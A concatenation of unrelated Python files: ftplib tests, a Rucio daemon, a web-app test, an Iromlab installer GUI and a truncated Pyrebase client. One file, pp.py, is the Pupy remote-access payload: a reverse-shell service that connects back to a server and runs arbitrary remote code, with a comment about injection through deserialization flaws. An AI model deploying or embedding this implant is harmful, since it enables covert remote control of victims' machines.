# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# ---------------------------------------------------------------
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import rpyc.core.stream
import rpyc.utils.factory
import threading
import weakref
import traceback
import os
import subprocess
import threading
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
import json
import argparse
from network import conf
from network.lib.base_launcher import LauncherError
import logging
import shlex
try:
import additional_imports #additional imports needed to package with pyinstaller
except ImportError:
pass
except Exception as e:
logging.warning(e)
if hasattr(sys, 'frozen') and sys.frozen:
logging.disable(logging.CRITICAL) # disable all logging, because it can injected pupy dll unresponsive
else:
logging.getLogger().setLevel(logging.ERROR)
def add_pseudo_pupy_module():
""" add a pseudo pupy module for *nix payloads """
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.pseudo=True
try:
import pupy
except ImportError:
if "pupy" not in sys.modules:
add_pseudo_pupy_module()
if "pupy" not in sys.modules:
add_pseudo_pupy_module()
import pupy
pupy.infos={} #global dictionary to store informations persistent through a deconnection
LAUNCHER="connect" # the default launcher to start when no argv
LAUNCHER_ARGS=shlex.split("--host 127.0.0.1:443 --transport ssl") # default launcher arguments
REVERSE_SLAVE_CONF=dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally = True,
propagate_KeyboardInterrupt_locally = True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
)
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF)
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def on_disconnect(self):
print "disconnecting !"
try:
self._conn.close()
except:
pass
raise
def exposed_exit(self):
print "exiting ..."
raise SystemExit
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_get_infos(self, s):
"""execute arbitrary code (using ``exec``)"""
import pupy
if not s in pupy.infos:
return None
return pupy.infos[s]
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_json_dumps(self, obj):
return json.dumps(obj)
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
class BindSlaveService(ReverseSlaveService):
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF)
import pupy
try:
from pupy_credentials import BIND_PAYLOADS_PASSWORD
password=BIND_PAYLOADS_PASSWORD
except:
from network.transports import DEFAULT_BIND_PAYLOADS_PASSWORD
password=DEFAULT_BIND_PAYLOADS_PASSWORD
if self._conn.root.get_password() != password:
self._conn.close()
raise KeyboardInterrupt("wrong password")
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def get_next_wait(attempt):
if attempt<120:
return random.randint(5,10)/10.0
elif attempt<320:
return random.randint(30,50)/10.0
else:
return random.randint(150,300)/10.0
def set_connect_back_host(HOST):
import pupy
pupy.get_connect_back_host=(lambda: HOST)
attempt=0
def main():
global LAUNCHER
global LAUNCHER_ARGS
global attempt
if len(sys.argv)>1:
parser = argparse.ArgumentParser(prog='pp.py', formatter_class=argparse.RawTextHelpFormatter, description="Starts a reverse connection to a Pupy server using the selected launcher\nLast sources: https://github.com/n1nj4sec/pupy\nAuthor: @n1nj4sec (contact@n1nj4.eu)\n")
parser.add_argument('--debug', action='store_true', help="increase verbosity")
parser.add_argument('launcher', choices=[x for x in conf.launchers], help="the launcher to use")
parser.add_argument('launcher_args', nargs=argparse.REMAINDER, help="launcher arguments")
args=parser.parse_args()
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
LAUNCHER=args.launcher
LAUNCHER_ARGS=shlex.split(' '.join(args.launcher_args))
if not LAUNCHER in conf.launchers:
exit("No such launcher: %s"%LAUNCHER)
if 'get_pupy_config' in pupy.__dict__:
try:
config_file=pupy.get_pupy_config()
exec config_file in globals()
except ImportError:
logging.warning("ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL")
while True:
try:
launcher=conf.launchers[LAUNCHER]()
try:
launcher.parse_args(LAUNCHER_ARGS)
except LauncherError as e:
launcher.arg_parser.print_usage()
exit(str(e))
if getattr(pupy, 'pseudo', False):
set_connect_back_host(launcher.get_host())
else:
pupy.get_connect_back_host=launcher.get_host
pupy.infos['launcher']=LAUNCHER
pupy.infos['launcher_args']=LAUNCHER_ARGS
pupy.infos['launcher_inst']=launcher
pupy.infos['transport']=launcher.get_transport()
rpyc_loop(launcher)
finally:
time.sleep(get_next_wait(attempt))
attempt+=1
def rpyc_loop(launcher):
global attempt
try:
for ret in launcher.iterate():
try:
if type(ret) is tuple: # bind payload
server_class, port, address, authenticator, stream, transport, transport_kwargs = ret
s=server_class(BindSlaveService, port=port, hostname=address, authenticator=authenticator, stream=stream, transport=transport, transport_kwargs=transport_kwargs)
s.start()
else: # connect payload
stream=ret
def check_timeout(event, cb, timeout=60):
time.sleep(timeout)
if not event.is_set():
logging.error("timeout occured !")
cb()
event=threading.Event()
t=threading.Thread(target=check_timeout, args=(event, stream.close))
t.daemon=True
t.start()
try:
conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {})
finally:
event.set()
attempt=0
conn.serve_all()
except KeyboardInterrupt:
raise
except EOFError:
raise
except SystemExit:
raise
except Exception as e:
logging.error(e)
except EOFError:
print "EOFError received, restarting the connection"
except KeyboardInterrupt:
print "keyboard interrupt raised, restarting the connection"
except SystemExit as e:
logging.error(e)
raise
except Exception as e:
logging.error(traceback.format_exc())
return
if __name__=="__main__":
main()
else:
t=threading.Thread(target=main) # to allow pupy to run in background when imported or injected through a python application exec/deserialization vulnerability
t.daemon=True
t.start()
|
preparer.py
|
# -*- coding: utf-8 -*-
# Copyright 2020-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
import functools
import logging
import threading
from time import time
from typing import TYPE_CHECKING
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import RucioException
from rucio.common.logging import setup_logging
from rucio.core.request import preparer_update_requests, reduce_requests, sort_requests_minimum_distance, \
get_transfertool_filter, get_supported_transfertools, rse_lookup_filter, list_transfer_requests_and_source_replicas
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
if TYPE_CHECKING:
from typing import Optional
from sqlalchemy.orm import Session
from rucio.daemons.conveyor.common import HeartbeatHandler
graceful_stop = threading.Event()
def stop():
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, bulk=100):
"""
Running the preparer daemon either once or by default in a loop until stop is called.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
def preparer_kwargs():
# not sure if this is needed for threading.Thread, but it always returns a fresh dictionary
return {'once': once, 'sleep_time': sleep_time, 'bulk': bulk}
threads = [threading.Thread(target=preparer, name=f'conveyor-preparer-{i}', kwargs=preparer_kwargs(), daemon=True) for i in range(threads)]
for thr in threads:
thr.start()
all_running = True
while all_running:
for thr in threads:
thr.join(timeout=3.14)
if not thr.is_alive() or graceful_stop.is_set():
all_running = False
break
if graceful_stop.is_set() or once:
logging.info('conveyor-preparer: gracefully stopping')
else:
logging.warning('conveyor-preparer: stopping out of the ordinary')
graceful_stop.set()
for thr in threads:
thr.join(timeout=3.14)
logging.info('conveyor-preparer: stopped')
def preparer(once, sleep_time, bulk, partition_wait_time=10):
# Make an initial heartbeat so that all instanced daemons have the correct worker number on the next try
logger_prefix = executable = 'conveyor-preparer'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=functools.partial(
run_once,
bulk=bulk
),
activities=None,
)
def run_once(bulk: int = 100, heartbeat_handler: "Optional[HeartbeatHandler]" = None, limit: "Optional[int]" = None, session: "Optional[Session]" = None, **kwargs) -> bool:
if heartbeat_handler:
worker_number, total_workers, logger = heartbeat_handler.live()
else:
# This is used in tests
worker_number, total_workers, logger = 0, 0, logging.log
start_time = time()
try:
req_sources = list_transfer_requests_and_source_replicas(
total_workers=total_workers,
worker_number=worker_number,
limit=limit,
request_state=RequestState.PREPARING,
session=session
)
if not req_sources:
count = 0
updated_msg = 'had nothing to do'
else:
transfertool_filter = get_transfertool_filter(lambda rse_id: get_supported_transfertools(rse_id=rse_id, session=session))
requests = reduce_requests(req_sources, [rse_lookup_filter, sort_requests_minimum_distance, transfertool_filter], logger=logger)
count = preparer_update_requests(requests, session=session)
updated_msg = f'updated {count}/{limit} requests'
except RucioException:
logger(logging.ERROR, 'errored with a RucioException, retrying later', exc_info=True)
count = 0
updated_msg = 'errored'
logger(logging.INFO, '%s, taking %.3f seconds' % (updated_msg, time() - start_time))
queue_empty = False
if count < bulk:
queue_empty = True
return queue_empty
|
simple_tests.py
|
'''
Created on May 31, 2016
@author: yglazner
'''
import unittest
import threading
from cheesyweb import *
import logging
import time
import requests
_app = None
log = logging.getLogger("Logger")
def stop_threaded():
if not _app: return
if _app.running:
_app.stop()
def _run(app):
global _app
_app = app
log.info("Starting %s"%app)
app.start(port=8085)
def run_threaded(app):
threading.Thread(target=_run, args=(app,)).start()
class Test(unittest.TestCase):
def setUp(self):
stop_threaded() #just in case
self.app = App()
self._setup_views()
run_threaded(self.app)
time.sleep(0.2)
def _setup_views(self):
class HelloWorld(View):
title = "hello world"
url = "hello/"
content = Label("Hello world!!!11")
self.app.add(HelloWorld())
def tearDown(self):
stop_threaded()
def testName(self):
r = (requests.get('http://localhost:8085/hello/'))
self.assertEqual(r.status_code, 200)
r.content
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
logging.basicConfig(level=logging.DEBUG)
unittest.main(argv=['', '-v'])
|
configure.pyw
|
#! /usr/bin/env python
"""Post-install / configuration script for Iromlab"""
import os
import sys
import imp
import site
import sysconfig
from shutil import copyfile
import threading
import logging
import pythoncom
from win32com.client import Dispatch
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
import tkinter.messagebox as tkMessageBox
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
import tkMessageBox
def errorExit(error):
"""Show error message in messagebox and then exit after userv presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(0)
def get_reg(name, path):
"""Read variable from Windows Registry"""
import winreg
# From http://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def main_is_frozen():
return (hasattr(sys, "frozen") or # new py2exe
hasattr(sys, "importers") # old py2exe
or imp.is_frozen("__main__")) # tools/freeze
def get_main_dir():
if main_is_frozen():
return os.path.dirname(sys.executable)
return os.path.dirname(sys.argv[0])
def post_install():
"""Install config file + pre-packaged tools to user dir +
Create a Desktop shortcut to the installed software
"""
# This is needed to avoid 'CoInitialize has not been called'
# error with Dispatch. See: https://stackoverflow.com/a/26753031
pythoncom.CoInitialize()
# Package name
packageName = 'iromlab'
# Part 1: install config file
# Locate Windows user directory
userDir = os.path.expanduser('~')
# Config directory
configDirUser = os.path.join(userDir, packageName)
# Create config directory if it doesn't exist
if not os.path.isdir(configDirUser):
logging.info("Creating user configuration directory ...")
try:
os.makedirs(configDirUser)
logging.info("Done!")
except IOError:
msg = 'could not create configuration directory'
errorExit(msg)
# Config file name
configFileUser = os.path.join(configDirUser, 'config.xml')
if not os.path.isfile(configFileUser):
# No config file in user dir, so copy it from location in package.
# Location is /iromlab/conf/config.xml in 'site-packages' directory
# if installed with pip)
logging.info("Copying configuration file to user directory ...")
# Locate site-packages dir (this returns multiple entries)
sitePackageDirs = site.getsitepackages()
# Assumptions: site package dir is called 'site-packages' and is
# unique (?)
for directory in sitePackageDirs:
if 'site-packages' in directory:
sitePackageDir = directory
# Construct path to config file
configFilePackage = os.path.join(sitePackageDir, packageName,
'conf', 'config.xml')
if os.path.isfile(configFilePackage):
try:
copyfile(configFilePackage, configFileUser)
logging.info("Done!")
except IOError:
msg = 'could not copy configuration file to ' + configFileUser
errorExit(msg)
# This should never happen but who knows ...
else:
msg = 'no configuration file found in package'
errorExit(msg)
# Part 2: create Desktop shortcut
logging.info("Creating desktop shortcut ...")
try:
# Scripts directory (location of launcher script)
#scriptsDir = sysconfig.get_path('scripts', 'nt_user')
scriptsDir = get_main_dir()
# Target of shortcut
target = os.path.join(scriptsDir, packageName + '.exe')
# Name of link file
linkName = packageName + '.lnk'
# Read location of Windows desktop folder from registry
regName = 'Desktop'
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.normpath(get_reg(regName, regPath))
# Path to location of link file
pathLink = os.path.join(desktopFolder, linkName)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(pathLink)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
shortcut.IconLocation = target
shortcut.save()
logging.info("Done!")
except Exception:
msg = 'Failed to create desktop shortcut'
errorExit(msg)
msg = 'Iromlab configuration completed successfully, click OK to exit!'
tkMessageBox.showinfo("Info", msg)
os._exit(0)
class TextHandler(logging.Handler):
"""This class allows you to log to a Tkinter Text or ScrolledText widget
Adapted from Moshe Kaplan:
https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
"""
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
"""This class defines the graphical user interface"""
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('Iromlab Configuration Tool')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled')
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
def main():
"""Main function"""
root = tk.Tk()
myGUI(root)
t1 = threading.Thread(target=post_install, args=[])
t1.start()
root.mainloop()
t1.join()
if __name__ == "__main__":
main()
|
pyrebase.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def initialize_app(config):
return Firebase(config)
class Firebase:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config["apiKey"]
self.auth_domain = config["authDomain"]
self.database_url = config["databaseURL"]
self.storage_bucket = config["storageBucket"]
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
# is releated to https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.', error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(max_retries=3)
else:
adapter = requests.adapters.HTTPAdapter(max_retries=3)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(self.credentials, self.api_key, self.database_url, self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid
}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
